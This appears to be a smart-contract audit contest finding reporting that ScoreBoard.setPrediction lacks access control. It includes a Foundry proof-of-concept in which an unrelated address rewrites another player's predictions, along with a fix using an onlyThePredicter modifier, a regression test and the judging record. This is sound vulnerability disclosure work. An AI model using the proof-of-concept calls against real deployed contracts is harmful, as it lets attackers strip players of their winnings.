Tags: Beginner Friendly, Foundry
Submission Details
Severity: high
Valid

Only the ThePredicter contract can call setPrediction

Summary

setPrediction lacks the validation that only the ThePredicter contract may call it.

Vulnerability Details

Because that validation is missing, anyone can call setPrediction directly on the ScoreBoard and overwrite another player's original predictions.

Impact

A player's predictions can be rewritten by an arbitrary address, so the player loses all of their profit.

Tools Used

Manual review, Foundry test (PoC below)

// Player scores can be modified by others: any address can call
// ScoreBoard.setPrediction directly and overwrite another player's predictions.
function test_poc_scoresModifyByOthers() public {
    vm.startPrank(stranger);
    vm.deal(stranger, 0.0003 ether);
    vm.stopPrank();

    // Organizer sets the result of match 0; the player predicts it correctly.
    vm.warp(2);
    vm.startPrank(organizer);
    scoreBoard.setResult(0, ScoreBoard.Result.First);
    vm.stopPrank();
    vm.startPrank(stranger);
    thePredicter.makePrediction{value: 0.0001 ether}(
        0,
        ScoreBoard.Result.First
    );
    vm.stopPrank();

    // Match 1: the player predicts incorrectly (Second vs. Draw).
    vm.warp(3);
    vm.startPrank(organizer);
    scoreBoard.setResult(1, ScoreBoard.Result.Draw);
    vm.stopPrank();
    vm.startPrank(stranger);
    thePredicter.makePrediction{value: 0.0001 ether}(
        1,
        ScoreBoard.Result.Second
    );
    vm.stopPrank();

    // Match 2: correct again.
    vm.warp(4);
    vm.startPrank(organizer);
    scoreBoard.setResult(2, ScoreBoard.Result.First);
    vm.stopPrank();
    vm.startPrank(stranger);
    thePredicter.makePrediction{value: 0.0001 ether}(
        2,
        ScoreBoard.Result.First
    );
    vm.stopPrank();

    vm.warp(5);
    vm.startPrank(organizer);
    scoreBoard.setResult(3, ScoreBoard.Result.First);
    vm.stopPrank();

    // Legitimate score: two correct, one wrong.
    assertEq(scoreBoard.getPlayerScore(stranger), 3);

    // An unrelated address rewrites the player's predictions through
    // ScoreBoard.setPrediction, bypassing ThePredicter entirely.
    address maliciousUser = makeAddr("maliciousUser");
    vm.startPrank(maliciousUser);
    scoreBoard.setPrediction(stranger, 0, ScoreBoard.Result.Draw);   // First  => Draw
    scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.First);  // Draw   => First
    scoreBoard.setPrediction(stranger, 2, ScoreBoard.Result.Second); // First  => Second
    vm.stopPrank();

    // Every prediction is now wrong: the player's score flips to -3.
    assertEq(scoreBoard.getPlayerScore(stranger), -3);
}

Recommendations

Add the onlyThePredicter modifier to setPrediction so that only the ThePredicter contract can call it:

function setPrediction(
    address player,
    uint256 matchNumber,
    Result result
) public onlyThePredicter {
    if (block.timestamp <= START_TIME + matchNumber * 68400 - 68400)
        playersPredictions[player].predictions[matchNumber] = result;
    playersPredictions[player].predictionsCount = 0;
    for (uint256 i = 0; i < NUM_MATCHES; ++i) {
        if (
            playersPredictions[player].predictions[i] != Result.Pending &&
            playersPredictions[player].isPaid[i]
        ) ++playersPredictions[player].predictionsCount;
    }
}
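A regression test for the recommended fix, added here as an example and not part of the original submission or the project's own test suite. It assumes the same Foundry test fixture as the PoC above (`scoreBoard`, `thePredicter`, `organizer`, `stranger`), that `getPlayerScore` returns an `int8`, and that the modifier reverts for any caller other than ThePredicter; it uses a bare `vm.expectRevert()` so it does not depend on the exact custom error name.

```solidity
// Added example (not the project's own test). Assumes the fixture used by the PoC:
// scoreBoard, thePredicter, organizer and stranger are set up in setUp().
function test_setPrediction_onlyThePredicterCanCall() public {
    // Legitimate path: the player predicts through ThePredicter, which is the
    // only contract allowed to reach ScoreBoard.setPrediction after the fix.
    vm.deal(stranger, 0.0003 ether);
    vm.warp(2);
    vm.prank(organizer);
    scoreBoard.setResult(0, ScoreBoard.Result.First);
    vm.prank(stranger);
    thePredicter.makePrediction{value: 0.0001 ether}(0, ScoreBoard.Result.First);

    // Assumption: getPlayerScore returns int8, as in the ScoreBoard interface.
    int8 before = scoreBoard.getPlayerScore(stranger);

    // A random EOA can no longer rewrite someone else's prediction.
    address maliciousUser = makeAddr("maliciousUser");
    vm.prank(maliciousUser);
    vm.expectRevert();
    scoreBoard.setPrediction(stranger, 0, ScoreBoard.Result.Draw);

    // Even the organizer is not ThePredicter and must be rejected too.
    vm.prank(organizer);
    vm.expectRevert();
    scoreBoard.setPrediction(stranger, 0, ScoreBoard.Result.Draw);

    // The player's own address is not ThePredicter either.
    vm.prank(stranger);
    vm.expectRevert();
    scoreBoard.setPrediction(stranger, 0, ScoreBoard.Result.Draw);

    // The stored prediction, and therefore the score, is unchanged.
    assertEq(scoreBoard.getPlayerScore(stranger), before);
}
```

The test checks the access-control boundary from three caller classes (an unrelated address, the privileged organizer, and the player themself) so that a future refactor cannot accidentally widen the modifier to "organizer or ThePredicter". If the actual revert reason should be pinned, replace the bare `vm.expectRevert()` with `vm.expectRevert(ScoreBoard.<ErrorName>.selector)` using the custom error declared next to the `onlyThePredicter` modifier in the project.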
Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement

Appeal created

bytesflow007 Submitter
about 1 year ago
NightHawK Lead Judge
about 1 year ago
bytesflow007 Submitter
about 1 year ago
NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.
